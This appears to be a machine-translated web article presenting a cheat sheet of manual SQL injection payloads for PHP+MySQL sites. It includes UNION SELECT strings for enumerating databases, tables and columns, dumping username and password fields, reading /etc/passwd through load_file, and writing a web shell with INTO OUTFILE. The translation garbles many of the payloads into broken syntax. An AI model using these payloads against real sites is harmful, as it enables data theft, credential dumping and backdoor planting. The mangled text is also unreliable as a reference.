What are the manual injection statements of PHP+MySQL
This article will explain in detail what are the manual injection sentences about PHP+MySQL. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.
Burst field length
Order by num/*
Matching field
And 1, 1 union select, 1, 2, 3, 4, 5. .n / *
Storm field location
And 1pm 2 union select 1pm 2pm 3pm 4pm 5... .. nswap *
Using built-in functions to expose database information
Version () database () user ()
There is no need to guess the available field burst database information (some websites are not applicable):
And 1: 2 union all select version () / *
And 1: 2 union all select database () / *
And 1: 2 union all select user () / *
Operating system information:
And 1: 2 union all select @ @ global.version_compile_os from mysql.user / *
Database permissions:
And ord (mid (user (), 1Power1)) = 114 / * return normal description as root
Burst database (mysql > 5.0)
Mysql 5 and above have a built-in library information_schema, which stores all the database and table structure information of mysql.
And 1 people 2 union select 1 from information_schema.SCHEMATA limit 2 people 3 from information_schema.SCHEMATA limit Magi SCHEMAO name 1, 5, 6, 7, 8, 9, 10, and 0.
Guess the table
And 1 recording 2 union select 1 union select 2 limit 3 limit 5, 6, 7, 8, 9, 10, 10, database (hexadecimal) limit 0 (initial record, 0 is the first starting record), 1 (shows 1 record)-
Guess field
And 1 from information_schema. 2 Union select 1 Union select 2 limit 3 limit 0 where TABLE_NAME= 5, 6, 7, 8, 9, 10, and where TABLE_NAME= table name (hex)
Violent password
And 1 minute 2 Union select 1 from 2 from 3, user name segment, 5 mine6 Magi 7, password segment, 8 mine9 from table name limit 0 Magi 1
Advanced usage (one available field displays two data contents):
Union select 1 from 2 from 3 concat (user name segment, 0x3c, password segment), 5, 6, 7, 7, 7, 7, and table name limit 0 concat 1
Write horse directly (Root permission)
Conditions: 1. Know the physical path of the site
2. Have enough permissions (you can use select … . From mysql.user test)
3. Magic_quotes_gpc () = OFF
Select''into outfile' physical path'
And 1: 2 union all select: HEX value into outfile 'path'
Common paths for load_file ():
1. Replace (load_file (0×2F6574632F706173737764), 0 × 3c, 0 × 20)
2. Replace (load_file (char (47 ~ 101 ~ 116 ~ 99 ~ 99), char (60), char (32))
The above two are to view a PHP file that fully displays the code. Sometimes some characters are not replaced, such as "